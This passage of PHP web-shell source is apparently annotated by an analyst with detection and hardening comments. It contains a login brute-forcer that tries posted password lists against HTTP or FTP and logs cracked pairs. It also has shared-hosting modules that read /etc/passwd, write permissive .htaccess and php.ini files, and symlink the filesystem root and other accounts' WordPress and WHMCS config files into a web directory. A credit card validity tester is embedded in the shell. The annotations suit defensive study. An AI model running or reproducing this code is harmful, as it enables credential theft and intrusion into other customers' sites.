 * Analyst note (annotation only; the code below is unchanged).
 * Credential-guessing routine of the shell's "whmcr" branch. It reads
 * newline-separated user and password lists, a port, a target and an output
 * file name from the POST body and tries every password for every user.
 * Defender view: the result is a rapid run of failed logins from the
 * compromised host against one target and port (the form above defaults the
 * port to 2082). Per-account lockout, rate limiting and alerting on bursts
 * of authentication failures are the relevant controls. The output file
 * named by POST 'crack' (form default crack.txt) is opened with a relative
 * path, so it is an artifact to look for in the script's working directory.
 */
error_reporting(0); set_time_limit(0); $connect_timeout=5;
/*
 * any(): makes one cURL request to $prtcl://$host:$aport with "$user:$pass"
 * as credentials and CURLOPT_FAILONERROR set. CURLOPT_hxxpAUTH is presumably
 * the paste's defanged spelling of the HTTP auth option. When curl_errno()
 * is 0 it prints the pair and appends "user pass" to the file named by
 * $cracked; fopen/fwrite errors are suppressed with @.
 */
function any($prtcl,$host,$user,$pass,$timeout,$cracked,$aport){ $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "$prtcl://$host:$aport"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_hxxpAUTH, CURLAUTH_BASIC); curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass"); curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout); curl_setopt($ch, CURLOPT_FAILONERROR, 1); $data = curl_exec($ch); if ( curl_errno($ch) == 0 ){ echo "<table width=100% ><tr><td align=center><b><font color=white size=2>=======================</font><font color=red size=2> $user </font><font color=white size=2>cracked with </font><font color=red size=2> $pass </font> <font color=white size=2>=======================</font></b></td></tr></table>"; $x=$user." ".$pass ." \n" ; $y=@fopen($cracked,'a+'); @fwrite($y,$x); } curl_close($ch); }
/* Rsl(): returns $host with one trailing "/" removed, otherwise unchanged. */
function Rsl($host) { if(strrpos($host, '/', -1) == strlen($host)-1) { return substr($host,0,strrpos($host, '/', -1)); } else{ return $host; } }
/*
 * Driver: runs only when POST 'cracking' is set. Port 21 selects the "ftp"
 * scheme; any other port selects the scheme the paste shows as "hxxp".
 * Every user/password pair is passed to any() after trimming.
 */
$userl=$_POST['usernames']; $passl=$_POST['passwords']; $port=trim($_POST['port']); $crack=$_POST['crack']; if(isset($_POST['cracking'])) { $target = trim($_POST['target']); $tarhr=ereg_replace("(hxxps?)://", "", $target); $tarwr=ereg_replace("www.", "", $tarhr); $ftar=rsl($tarwr); $userlist=explode("\n",$userl); $passlist=explode("\n",$passl); if($port!=21) { $protocol="hxxp"; foreach ($userlist as $user) { echo "<table width=80% ><tr><td align=center><b><font color=white size=2>user under attack is $user </font></td></tr></table>"; $finaluser = trim($user); foreach ($passlist as $password ) { $finalpass = trim($password); any($protocol,$target,$finaluser,$finalpass,$connect_timeout,$crack,$port); } } } else{ $protocol="ftp"; foreach ($userlist as $user) { echo "<table width=80% ><tr><td align=center><b><font color=white size=2>user under attack is $user </font></td></tr></table>"; $finaluser = trim($user); foreach ($passlist as $password ) 
{ $finalpass = trim($password); any($protocol,$target,$finaluser,$finalpass,$connect_timeout,$crack,$port); } } } } ?></center>
6821<?php } elseif(isset($_GET['x']) && ($_GET['x'] == 'ccv')) { ?>
6822 <form action="?y=<?php echo $pwd; ?>&x=ccv" method="post">
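<?php
/**
 * Checks whether a payment card number is structurally plausible.
 *
 * A number passes when its first digit is an accepted Major Industry
 * Identifier, its length and leading digits match an active card type, and
 * its Luhn checksum is correct. This is a format check only: it says nothing
 * about whether an account exists.
 *
 * The result array keeps only a masked form of the number (last four
 * digits), so the full number is not retained by this object.
 */
class CreditCardValidator
{
    /** Outcome of the most recent Validate() call. */
    private $arrCardInfo = array(
        'status' => null,
        'type' => null,
        'substring' => null,
        'reason' => null,
    );

    /**
     * Known card types. 'iinrange' is a comma-separated list of prefixes or
     * "low-high" prefix ranges; both bounds of a range have the same number
     * of digits.
     */
    private $arrCardTypes = array(
        'amex' => array('name' => 'American Express', 'active' => true, 'iinrange' => '34,37', 'length' => 15),
        'discover' => array('name' => 'Discover', 'active' => true, 'iinrange' => '6011,622126-622925,644-649,65', 'length' => 16),
        'mastercard' => array('name' => 'MasterCard', 'active' => true, 'iinrange' => '51-55', 'length' => 16),
        'visa' => array('name' => 'VISA', 'active' => true, 'iinrange' => '4', 'length' => 16),
    );

    /** First digits (Major Industry Identifiers) that are accepted. */
    private $arrAcceptedMII = array(3, 4, 5, 6);

    /**
     * Validates a card number, optionally against an expected card type.
     *
     * @param mixed       $strCardNumber Card number; non-digit characters are ignored.
     * @param string|null $strCardType   Short name of the expected type (a key of
     *                                   the card type table), or null for any type.
     * @return bool True when the number passes every check. Details are
     *              available from GetCardInfo().
     */
    public function Validate($strCardNumber = null, $strCardType = null)
    {
        // Start from a clean result so a previous failure cannot leak into this one.
        $this->arrCardInfo = array('status' => null, 'type' => null, 'substring' => null, 'reason' => null);

        // Request data can be an array; only scalar input can be a card number.
        if ($strCardNumber === null || !is_scalar($strCardNumber)) {
            return $this->Fail('format');
        }
        $strCardNumber = (string) $strCardNumber;

        // The expected type must be a key of the table. The previous in_array()
        // call compared against the table's values (arrays) and never matched.
        if ($strCardType !== null && (!is_string($strCardType) || !isset($this->arrCardTypes[$strCardType]))) {
            return $this->Fail('cardtype');
        }

        if (!$this->CheckMII($strCardNumber)) {
            return $this->Fail('mii');
        }
        if (!$this->CheckIIN($strCardNumber)) {
            return $this->Fail('iin');
        }
        // CheckIIN() stored the detected type(s); an expected type must be among them.
        if ($strCardType !== null && !in_array($strCardType, explode('|', $this->arrCardInfo['type']), true)) {
            return $this->Fail('cardtype');
        }
        if (!$this->CheckLuhn($strCardNumber)) {
            return $this->Fail('algorithm');
        }

        $this->arrCardInfo['status'] = 'valid';
        $this->arrCardInfo['substring'] = $this->GetCardSubstring($strCardNumber);
        return true;
    }

    /**
     * Records a failed validation and returns false.
     *
     * 'failure' is the key earlier callers read; 'reason' is the key the result
     * array declares. Both are filled so neither reader breaks.
     */
    private function Fail($strReason)
    {
        $this->arrCardInfo['failure'] = $strReason;
        $this->arrCardInfo['reason'] = $strReason;
        $this->arrCardInfo['status'] = 'invalid';
        return false;
    }

    /** Returns the input with everything except ASCII digits removed. */
    private function CleanCardNumber($strCardNumber = null)
    {
        return preg_replace('/[^0-9]/', '', (string) $strCardNumber);
    }

    /**
     * Returns a masked form of the number: "***" plus the last four digits.
     * An input that is already a short masked value is returned unchanged.
     */
    private function GetCardSubstring($strCardNumber = null)
    {
        $strCardNumber = (string) $strCardNumber;
        // Length check: the earlier code called substr() with one argument here.
        if (strpos($strCardNumber, '*') !== false && strlen($strCardNumber) < 10) {
            return $strCardNumber;
        }
        $strDigits = $this->CleanCardNumber($strCardNumber);
        return $strDigits ? '***' . substr($strDigits, -4) : '';
    }

    /** True when the first digit is one of the accepted industry identifiers. */
    private function CheckMII($strCardNumber = null)
    {
        $strDigits = $this->CleanCardNumber($strCardNumber);
        if (!$strDigits) {
            return false;
        }
        return in_array((int) $strDigits[0], $this->arrAcceptedMII, true);
    }

    /** True when the digits satisfy the Luhn checksum. */
    private function CheckLuhn($strCardNumber = null)
    {
        $strReversed = strrev((string) $this->CleanCardNumber($strCardNumber));
        $intLength = strlen($strReversed);
        if ($intLength === 0) {
            return false;
        }
        $intTotal = 0;
        for ($i = 0; $i < $intLength; $i++) {
            $intVal = (int) $strReversed[$i];
            // Every second digit counted from the right is doubled; a two-digit
            // result contributes the sum of its digits, which equals value - 9.
            if ($i % 2 === 1) {
                $intVal *= 2;
                if ($intVal > 9) {
                    $intVal -= 9;
                }
            }
            $intTotal += $intVal;
        }
        return ($intTotal % 10) === 0;
    }

    /**
     * Finds the active card types whose length and prefix match the number and
     * stores their short names, joined with "|", in the result's 'type' field.
     *
     * @return bool True when at least one type matches.
     */
    private function CheckIIN($strCardNumber = null)
    {
        $strDigits = $this->CleanCardNumber($strCardNumber);
        if (!$strDigits) {
            return false;
        }
        $intLength = strlen($strDigits);
        $arrCardTypePossibilities = array();
        foreach ($this->arrCardTypes as $strShortName => $arrCardType) {
            if ($arrCardType['active'] !== true || $intLength != $arrCardType['length']) {
                continue;
            }
            foreach (explode(',', $arrCardType['iinrange']) as $strRangeSetItem) {
                $arrBounds = explode('-', trim($strRangeSetItem));
                $strLow = trim($arrBounds[0]);
                $strHigh = isset($arrBounds[1]) ? trim($arrBounds[1]) : $strLow;
                // Compare the leading digits numerically instead of testing
                // every value in the range one by one.
                $intPrefix = (int) substr($strDigits, 0, strlen($strLow));
                if ($intPrefix >= (int) $strLow && $intPrefix <= (int) $strHigh) {
                    $arrCardTypePossibilities[] = $strShortName;
                    break;
                }
            }
        }
        $this->arrCardInfo['type'] = implode('|', $arrCardTypePossibilities);
        return count($arrCardTypePossibilities) > 0;
    }

    /** Returns the result array of the most recent Validate() call. */
    public function GetCardInfo()
    {
        return $this->arrCardInfo;
    }

    /** Returns the display name for a card type short name, or '' if unknown. */
    public function GetCardName($strCardShortName = null)
    {
        return (is_string($strCardShortName) && isset($this->arrCardTypes[$strCardShortName]['name']))
            ? $this->arrCardTypes[$strCardShortName]['name']
            : '';
    }
}

$CCV = new CreditCardValidator();
if (isset($_POST['cardnum'])) :
    $CCV->Validate($_POST['cardnum']);
    $CARDINFO = $CCV->GetCardInfo();
endif;
?>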
6824
6825<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "hxxp://www.w3.org/TR/html4/strict.dtd">
6826
6827<html lang="en">
6828
6829 <head>
6830
6831 <meta hxxp-equiv="Content-Type" content="text/html; charset=utf-8">
6832
6833 <title>Credit Card Validation - Test Page</title>
6834
6835 <style type="text/css">
6836 body{ font-size: 13px; color: #333; font-family: 'georgia', 'times new roman', serif; margin: 20px; }
6837 fieldset{ border: 0; margin: 0; font-style: italic; }
6838 legend{ display: none; }
6839 label{ width: 100%; float: left; clear: both; font-size: 15px; font-weight: bold; color: #999; line-height: 3; }
6840 input, textarea{ font-size: 18px; line-height: 1.4; padding: 10px; border: 2px solid #eee; }
6841 textarea{ background-color: #eee; color: blue; }
6842 h2{ font-size: 30px; }
6843 #fs-input input{ width: 500px; margin-bottom: 15px; }
6844 #fs-input input.cb{ width: auto; }
6845 #fs-submit input{ background-color: #333; color: lightyellow; }
6846 </style>
6847
6848 </head>
6849
6850 <body>
6851
6852 <h2>Credit Card Tester</h2>
6853
6854 <form action="" method="post">
6855
6856 <fieldset id="fs-input">
6857 <legend></legend>
6858 <label>Card Number</label>
6859 <input type="text" style="color:#FF0000;background-color:#000000" name="cardnum" value="<?php echo @$_POST['cardnum']; ?>"><br>
6860 <input type="checkbox" name="showgeek" class="cb" value="1"<?php if(isset($_POST['showgeek'])) echo ' checked'; ?>> Show Geeky Output
6861 </fieldset>
6862
6863 <fieldset id="fs-submit">
6864 <legend></legend>
6865 <label></label>
6866 <input type="submit" value="Check CC">
6867 </fieldset>
6868
6869 <?php if(isset($_POST['cardnum'])) : ?>
6870 <hr>
6871 <h2>Result</h2>
6872 <fieldset id="fs-result">
6873 <legend></legend>
6874 <label></label>
6875 <strong>Status:</strong> <?php echo strtoupper($CARDINFO['status']); ?><br>
6876 <strong>Card Type: </strong> <?php echo $CCV->GetCardName($CARDINFO['type']); ?>
6877 </fieldset>
6878 <?php endif; ?>
6879 <?php if(isset($_POST['showgeek'])) : ?>
6880 <fieldset id="fs-geek-result">
6881 <legend></legend>
6882 <label>Geeky Result</label>
6883 <textarea style="color:#FF0000;background-color:#000000" rows="40" cols="80"><?php print_r($CCV); ?></textarea>
6884 </fieldset>
6885 <?php endif; ?>
6886
6887
6888 </form>
6889
6890 </body>
6891
6892</html>
6893 <?php } elseif(isset($_GET['x']) && ($_GET['x'] == 'apache')) { ?>
6894 <form action="?y=<?php echo $pwd; ?>&x=apache" method="post">
6895 <?php $head = '
6896<html>
6897<head>
6898</script>
6899<title>APACHE</title>
6900<meta hxxp-equiv="Content-Type" content="text/html; charset=UTF-8">
6901<script language=\'javascript\'>
6902function hide_div(id)
6903{
6904 document.getElementById(id).style.display = \'none\';
6905 document.cookie=id+\'=0;\';
6906}
6907function show_div(id)
6908{
6909 document.getElementById(id).style.display = \'block\';
6910 document.cookie=id+\'=1;\';
6911}
6912function change_divst(id)
6913{
6914if (document.getElementById(id).style.display == \'none\')
6915show_div(id);
6916else
6917hide_div(id);
6918}
6919</script>'; ?>
6920<html>
6921<head>
6922<?php echo $head; ?>
6923<body bgcolor=black><center><br/><br/> <img src="hxxp://silk.apana.org.au/graphics/apache_logo.gif">
6924<form method=post><br/><br/>
6925<nobr><b><span class='b7'>[ APACHE</span> <span class='b8'>TOOLS ]</span></b></nobr><br/><br/>
6926<p><input type=submit style=color:#FF0000;background-color:#000000 name="usre" value="EXTRACT USER" /></form><br/><br/><br/>
6927
6928<?php if(isset($_POST['usre'])){ ?>
6929<form method=post>
6930<textarea rows=20 style=color:#FF0000;background-color:#000000 cols=60 name=user><?php $users=file("/etc/passwd"); foreach($users as $user) { $str=explode(":",$user); echo $str[0]."\n"; } ?></textarea><br><br>
6931<input type=submit style=color:#FF0000;background-color:#000000 name=su value="EXECUTE" /></form><br/>
6932<?php } ?>
6933
6934<?php
/*
 * Analyst note (annotation only; the code below is unchanged).
 * Runs when POST 'su' is set. It creates the directory 'dm' with mode 0777,
 * writes an .htaccess there whose visible directives include "Options all"
 * and "AddType text/plain" for .php, .html, .bak and .old, and creates
 * dm/dm.txt as a symbolic link to "/". It then creates the directory 'DM'
 * with the same kind of .htaccess. The leading numbers inside the string
 * literals are presumably line-number residue from the paste.
 * Presumed purpose: on a shared host where the web server follows symlinks,
 * have it return other accounts' configuration files as plain text.
 * Defender view: look for newly created 'dm' / 'DM' directories under a web
 * root, an .htaccess that remaps .php to text/plain, symlinks that point to
 * "/" or into other users' home directories, and link names containing "~".
 * Relevant hardening: Apache "Options -FollowSymLinks" or
 * "SymLinksIfOwnerMatch", an AllowOverride setting that does not let
 * .htaccess change Options, home directories that are not readable by other
 * accounts, and symlink listed in PHP's disable_functions.
 */
error_reporting(0); if(isset($_POST['su'])){ mkdir('dm',0777); $rr = "Options all \r
6935DirectoryIndex Sux.html \r
6936AddType text/plain .php \r
6937AddType text/plain .html \r
6938AddType text/plain .bak \r
6939AddType text/plain .old \r
6940AddHandler server-parsed .php \r
6941AddHandler txt .html \r
6942Require None \r Satisfy Any"; $g = fopen('dm/.htaccess','w'); fwrite($g,$rr); $dm = symlink("/","dm/dm.txt"); $rt="<a href=dm/dm.txt><b><span class='b11'>[ SYMLINK ]</span></b></a>"; echo "<nobr>[~] "; echo "$rt"; $dir=mkdir('DM',0777); $r = "Options all \r
6943DirectoryIndex Sux.html \r
6944AddType text/plain .php \r
6945AddType text/plain .html \r
6946AddType text/plain .bak \r
6947AddType text/plain .old \r
6948AddHandler server-parsed .php \r
6949AddHandler txt .html \r
6950Require None \r
6951Satisfy Any"; $f = fopen('DM/.htaccess','w'); fwrite($f,$r); $consym="<a href=DM/><b><span class='b11'>[ CONFIG KILLER ]</span></b> </a>"; echo " [~] "; echo "$consym"; echo " [~]</nobr>";
/*
 * For every name in POST 'user' (one per line) and every file name in
 * $configuration, a symlink DM/<user>~<file> is created that points at
 * /home/<user>/public_html/<file>. The list is made of common PHP
 * configuration file names plus .old and .bak variants.
 */
$usr=explode("\n",$_POST['user']); $configuration=array( "aksi.php", "aksi.php.old", "aksi.php.bak", "conf.php", "conf.php.old", "conf.php.bak", "conf_global.php", "conf_global.php.old", "conf_global.php.bak", "config.php", "config.php.old", "config.php.bak", "configuration.php", "configuration.php.old", "configuration.php.bak", "conn.php", "conn.php.old", "conn.php.bak", "connect.php", "connect.php.old", "connect.php.bak", "connection.php", "connection.php.old", "connection.php.bak", "db.php", "db.php.old", "db.php.bak", "database.php", "database.php.old", "database.php.bak", "inc.php", "inc.php.old", "inc.php.bak", "koneksi.php", "koneksi.php.old", "koneksi.php.bak", "mysql.php", "myqsl.php.old", "mysql.php.bak", "setting.php", "setting.php.old", "setting.php.bak", "Settings.php", "Settings.php.old", "Settings.php.bak", "sql.php", "sql.php.old", "sql.php.bak"); foreach($usr as $uss ){ $us=trim($uss); foreach($configuration as $c){ $rs="/home/".$us."/public_html/".$c; $r="DM/".$us."~".$c; symlink($rs,$r); } } } ?>
6952 <?php } elseif(isset($_GET['x']) && ($_GET['x'] == 'hostgator')) { ?>
6953 <form action="?y=<?php echo $pwd; ?>&x=hostgator" method="post">
6954 <?php $head = '
6955<html>
6956<head><title>HOSTGATOR</title>
6957<meta hxxp-equiv="Content-Type" content="text/html; charset=UTF-8">
6958<script language=\'javascript\'>
6959function hide_div(id){
6960 document.getElementById(id).style.display = \'none\';
6961 document.cookie=id+\'=0;\';
6962}
6963
6964function show_div(id){
6965document.getElementById(id).style.display = \'block\';
6966document.cookie=id+\'=1;\';
6967}
6968
6969function change_divst(id){
6970if (document.getElementById(id).style.display == \'none\')
6971show_div(id);
6972else
6973hide_div(id);
6974}
6975</script>'; ?>
6976<html>
6977<head>
6978<?php echo $head; ?>
6979<body bgcolor=black><center><br/><br/><img src="hxxp://partnernoc.cpanel.net/logo/822-4021-logo.png">
6980<form method=post><br/><br/>
6981<nobr><b><span class='b7'>[ HOSTGATOR</span> <span class='b8'>TOOLS ]</span></b></nobr><br/><br/>
6982<p><input type=submit style=color:#FF0000;background-color:#000000 name="usre" value="EXTRACT USER" /></form><br/><br/><br/>
6983
6984<?php if(isset($_POST['usre'])){ ?>
6985<form method=post>
6986<textarea rows=20 style=color:#FF0000;background-color:#000000 cols=60 name=user><?php $users=file("/etc/passwd"); foreach($users as $user){ $str=explode(":",$user); echo $str[0]."\n"; } ?></textarea><br><br>
6987<input type=submit style=color:#FF0000;background-color:#000000 name=su value="./EXECUTE" /></form><br/>
6988<?php } ?>
6989
6990<?php error_reporting(0); if(isset($_POST['su'])){ mkdir('hostgator',0777); $r = "Options +FollowSymLinks \n
6991DirectoryIndex Sux.html \n
6992Options +Indexes \n
6993AddType text/plain .php \n
6994AddHandler server-parsed .php \n
6995AddType text/plain.html "; $g = fopen('hostgator/.htaccess','w'); fwrite($g,$rr); $dm = symlink("/","hostgator/dm.ini"); $rt="<a href=hostgator/dm.ini><b><span class='b11'>[ SYMLINK ]</span></b></a>"; echo "<nobr>[~] "; echo "$rt"; $dir=mkdir('HOSTGATOR',0777); $rr = "Safe_mode = OFF \n
6996Disable_functions = NONE \n
6997Open_basedir = OFF"; $f = fopen('HOSTGATOR/php.ini','w'); fwrite($f,$rr); $rrr = "Options +FollowSymLinks \n
6998DirectoryIndex Sux.html \n
6999Options +Indexes \n
7000AddType text/plain .php \n
7001AddHandler server-parsed .php \n
7002AddType text/plain.html "; $ff = fopen('HOSTGATOR/.htaccess','w'); fwrite($ff,$rrr); $consym="<a href=HOSTGATOR/>
7003<span class='b11'>[ CONFIG KILLER ]</span></b></a>"; echo " [~] "; echo "$consym"; echo " [~]</nobr>"; $usr=explode("\n",$_POST['user']); $configuration=array("wp-config.ini", "wordpress/wp-config.ini", "configuration.ini", "blog/wp-config.ini", "joomla/configuration.ini", "vb/includes/config.ini", "includes/config.ini", "conf_global.ini", "inc/config.ini", "config.ini", "Settings.ini", "sites/default/settings.ini", "whm/configuration.ini", "whmcs/configuration.ini", "support/configuration.ini", "whmc/WHM/configuration.ini", "whm/WHMCS/configuration.ini", "whm/whmcs/configuration.ini", "support/configuration.ini", "clients/configuration.ini", "client/configuration.ini", "clientes/configuration.ini", "cliente/configuration.ini", "clientsupport/configuration.ini", "billing/configuration.ini", "admin/config.ini"); foreach($usr as $uss ){ $us=trim($uss); foreach($configuration as $c){ $rs="/home/".$us."/public_html/".$c; $r="HOSTGATOR/".$us."~".$c; symlink($rs,$r); } } } ?>
7004 <?php } elseif(isset($_GET['x']) && ($_GET['x'] == 'bluehost')) { ?>
7005 <form action="?y=<?php echo $pwd; ?>&x=bluehost" method="post">
7006 <?php $head = '
7007<html>
7008<head><title>BLUEHOST</title>
7009<meta hxxp-equiv="Content-Type" content="text/html; charset=UTF-8">
7010<script language=\'javascript\'>
7011function hide_div(id){
7012 document.getElementById(id).style.display = \'none\';
7013 document.cookie=id+\'=0;\';
7014}
7015
7016function show_div(id){
7017document.getElementById(id).style.display = \'block\';
7018document.cookie=id+\'=1;\';
7019}
7020
7021function change_divst(id){
7022if (document.getElementById(id).style.display == \'none\')
7023show_div(id);
7024else
7025hide_div(id);
7026}
7027</script>'; ?>
7028<html>
7029<head>
7030<?php echo $head; ?>
7031<body bgcolor=black>
7032<center><br/><br/>
7033<img src="hxxp://www.ananova.com/wp-content/uploads/2013/04/bluehost-review-by-toptenhostings.jpg">
7034<form method=post><br/><br/><nobr><b><span class='b7'>[ BLUEHOST</span> <span class='b8'>TOOLS ]</span></b></nobr><br/><br/>
7035<p><input type=submit style=color:#FF0000;background-color:#000000 name="usre" value="EXTRACT USER" /></form><br/><br/><br/>
7036
7037<?php if(isset($_POST['usre'])){ ?>
7038<form method=post>
7039<textarea rows=20 style=color:#FF0000;background-color:#000000 cols=60 name=user><?php $users=file("/etc/passwd"); foreach($users as $user){ $str=explode(":",$user); echo $str[0]."\n"; } ?></textarea><br><br>
7040<input type=submit style=color:#FF0000;background-color:#000000 name=su value="./EXECUTE" /></form><br/>
7041<?php } ?>
7042<?php error_reporting(0); echo "<font color=white size=2 face=\"comic sans ms\">"; if(isset($_POST['su'])){ mkdir('bluehost',0777); $rr = "AllowOverride All None \n
7043DirectoryIndex index.html index.htm index.php index.php4 index.php5 \n
7044AddType application/octet-stream .php \n
7045AddHandler server-parsed .php \n
7046Addhandler cgi-script .asp \n
7047AddType ini .php \n
7048AddHandler ini .php"; $g = fopen('bluehost/.htaccess','w'); fwrite($g,$rr); $dm = symlink("/","bluehost/dm.ini"); $rt="<a href=bluehost/dm.ini><b><span class='b11'>[ SYMLINK ]</span></b></a>"; echo "<nobr>[~] "; echo "$rt"; $dir=mkdir('BLUEHOST',0777); $r = "Options all \n DirectoryIndex Sux.html \n
7049AddType text/plain .php \n
7050AddHandler server-parsed .php \n
7051AddType text/plain .html \n
7052AddHandler txt .html \n
7053Require None \n
7054Satisfy Any"; $f = fopen('BLUEHOST/.htaccess','w'); fwrite($f,$r); $consym="<a href=BLUEHOST/><span class='b11'>[ CONFIG KILLER ]</span></b></a>"; echo " [~] "; echo "$consym"; echo " [~]</nobr>"; $usr=explode("\n",$_POST['user']); $configuration=array("wp-config.ini", "wordpress/wp-config.ini", "configuration.ini", "blog/wp-config.ini", "joomla/configuration.ini", "vb/includes/config.ini", "includes/config.ini", "conf_global.ini", "inc/config.ini", "config.ini", "Settings.ini", "sites/default/settings.ini", "whm/configuration.ini", "whmcs/configuration.ini", "support/configuration.ini", "whmc/WHM/configuration.ini", "whm/WHMCS/configuration.ini", "whm/whmcs/configuration.ini", "support/configuration.ini", "clients/configuration.ini", "client/configuration.ini", "clientes/configuration.ini", "cliente/configuration.ini", "clientsupport/configuration.ini", "billing/configuration.ini", "admin/config.ini"); foreach($usr as $uss ){ $us=trim($uss); foreach($configuration as $c){ $rs="/home/".$us."/public_html/".$c; $rs="/home1/".$us."/public_html/".$c; $rs="/home2/".$us."/public_html/".$c; $rs="/home3/".$us."/public_html/".$c; $rs="/home4/".$us."/public_html/".$c; $rs="/home5/".$us."/public_html/".$c; $rs="/home6/".$us."/public_html/".$c; $rs="/home7/".$us."/public_html/".$c; $rs="/home8/".$us."/public_html/".$c; $r="BLUEHOST/".$us."~".$c; symlink($rs,$r); } } } ?>
7055 <?php } elseif(isset($_GET['x']) && ($_GET['x'] == 'ovh')) {
/* Web-shell module selected by ?x=ovh. It lists local account names and then
   plants symlinks to other accounts' application config files inside a
   web-served directory. Every file or directory it creates (see the comments
   further down) is a compromise indicator on a shared host. */ ?>
7056 <form action="?y=<?php echo $pwd; ?>&x=ovh" method="post">
7057 <?php /* $head: static page header with show/hide JavaScript helpers; echoed unchanged below. */ $head = '
7058<html>
7059<head><title>OVH</title>
7060<meta hxxp-equiv="Content-Type" content="text/html; charset=UTF-8">
7061<script language=\'javascript\'>
7062function hide_div(id){
7063 document.getElementById(id).style.display = \'none\';
7064 document.cookie=id+\'=0;\';
7065}
7066
7067function show_div(id){
7068document.getElementById(id).style.display = \'block\';
7069document.cookie=id+\'=1;\';
7070}
7071
7072function change_divst(id){
7073if (document.getElementById(id).style.display == \'none\')
7074show_div(id);
7075else
7076hide_div(id);
7077}
7078</script>'; ?>
7079<html>
7080<head>
7081<?php echo $head; ?>
7082<body bgcolor=black><center><br/><br/><img src="hxxp://alsace-international.eu/IMG/LOGOS/Entreprises/OVH_Logo.gif">
7083<form method=post><br/><br/>
7084<nobr><b><span class='b7'>[ OVH</span> <span class='b8'>TOOLS ]</span></b></nobr><br/><br/>
7085<p><input type=submit style=color:#FF0000;background-color:#000000 name="usre" value="EXTRACT USER" /></form><br/><br/><br/>
7086
7087<?php /* "EXTRACT USER": reads /etc/passwd and prints the first ':'-separated
   field of every line into the textarea that is posted back as $_POST['user']. */
if(isset($_POST['usre'])){ ?>
7088<form method=post>
7089<textarea rows=20 style=color:#FF0000;background-color:#000000 cols=60 name=user><?php $users=file("/etc/passwd"); foreach($users as $user){ $str=explode(":",$user); echo $str[0]."\n"; } ?></textarea><br><br>
7090<input type=submit style=color:#FF0000;background-color:#000000 name=su value="./EXECUTE" /></form><br/>
7091<?php } ?>
7092
7093<?php
/* "./EXECUTE": error reporting is switched off, then the code creates the
   directories ovh/ and OVH/ (mode 0777) relative to the current directory,
   writes .htaccess files into both and a php.ini into OVH/, links "/" to
   ovh/dm.ini, and calls symlink() once per (posted account name, config
   filename) pair, naming each link OVH/<account>~<file>. No return value of
   mkdir/fopen/fwrite/symlink is checked.
   Hunting: directories named ovh or OVH under a document root that hold
   symlinks resolving outside the owning account, plus a php.ini containing
   "Disable_functions = NONE".
   Hardening: SymLinksIfOwnerMatch instead of FollowSymLinks, a restrictive
   AllowOverride, and application config files that other accounts cannot read. */
error_reporting(0); if(isset($_POST['su'])){ mkdir('ovh',0777); $r = "AllowOverride All None \n
7094DirectoryIndex index.html index.htm index.php index.php4 index.php5 \n
7095AddType application/octet-stream .php \n
7096AddHandler server-parsed .php \n
7097Addhandler cgi-script .asp \n
7098AddType ini .php \n
7099AddHandler ini .php"; $g = fopen('ovh/.htaccess','w'); fwrite($g,$rr); $dm = symlink("/","ovh/dm.ini"); $rt="<a href=ovh/dm.ini><b><span class='b11'>[ SYMLINK ]</span></b></a>"; echo "<nobr>[~] "; echo "$rt"; $dir=mkdir('OVH',0777); $rr = "Safe_mode = OFF \n
7100Disable_functions = NONE \n
7101Open_basedir = OFF"; $f = fopen('OVH/php.ini','w'); fwrite($f,$rr); $rrr = "AllowOverride All None \n
7102DirectoryIndex index.html index.htm index.php index.php4 index.php5 \n
7103AddType application/octet-stream .php \n
7104AddHandler server-parsed .php \n
7105AddHandler cgi-script .asp \n
7106AddType ini .php \n
7107AddHandler ini .php"; $ff = fopen('OVH/.htaccess','w'); fwrite($ff,$rrr); $consym="<a href=OVH/>
7108<span class='b11'>[ CONFIG KILLER ]</span></b></a>"; echo " [~] "; echo "$consym"; echo " [~]</nobr>"; $usr=explode("\n",$_POST['user']); $configuration=array("wp-config.ini", "wordpress/wp-config.ini", "configuration.ini", "blog/wp-config.ini", "joomla/configuration.ini", "vb/includes/config.ini", "includes/config.ini", "conf_global.ini", "inc/config.ini", "config.ini", "Settings.ini", "sites/default/settings.ini", "whm/configuration.ini", "whmcs/configuration.ini", "support/configuration.ini", "whmc/WHM/configuration.ini", "whm/WHMCS/configuration.ini", "whm/whmcs/configuration.ini", "support/configuration.ini", "clients/configuration.ini", "client/configuration.ini", "clientes/configuration.ini", "cliente/configuration.ini", "clientsupport/configuration.ini", "billing/configuration.ini", "admin/config.ini"); foreach($usr as $uss ){ $us=trim($uss); foreach($configuration as $c){ $rs="/homez.0/".$us."/www/".$c; $rs="/homez.1/".$us."/www/".$c; $rs="/homez.2/".$us."/www/".$c; $rs="/homez.3/".$us."/www/".$c; $rs="/homez.4/".$us."/www/".$c; $rs="/homez.5/".$us."/www/".$c; $rs="/homez.6/".$us."/www/".$c; $rs="/homez.7/".$us."/www/".$c; $rs="/homez.8/".$us."/www/".$c; $rs="/homez.9/".$us."/www/".$c; $rs="/homez.10/".$us."/www/".$c; $rs="/homez.11/".$us."/www/".$c; $rs="/homez.12/".$us."/www/".$c; $rs="/homez.13/".$us."/www/".$c; $rs="/homez.14/".$us."/www/".$c; $rs="/homez.15/".$us."/www/".$c; $rs="/homez.16/".$us."/www/".$c; $rs="/homez.17/".$us."/www/".$c; $rs="/homez.18/".$us."/www/".$c; $rs="/homez.19/".$us."/www/".$c; $rs="/homez.20/".$us."/www/".$c; $rs="/homez.21/".$us."/www/".$c; $rs="/homez.22/".$us."/www/".$c; $rs="/homez.23/".$us."/www/".$c; $rs="/homez.24/".$us."/www/".$c; $rs="/homez.25/".$us."/www/".$c; $rs="/homez.26/".$us."/www/".$c; $rs="/homez.27/".$us."/www/".$c; $rs="/homez.28/".$us."/www/".$c; $rs="/homez.29/".$us."/www/".$c; $rs="/homez.30/".$us."/www/".$c; $rs="/homez.31/".$us."/www/".$c; $rs="/homez.32/".$us."/www/".$c; 
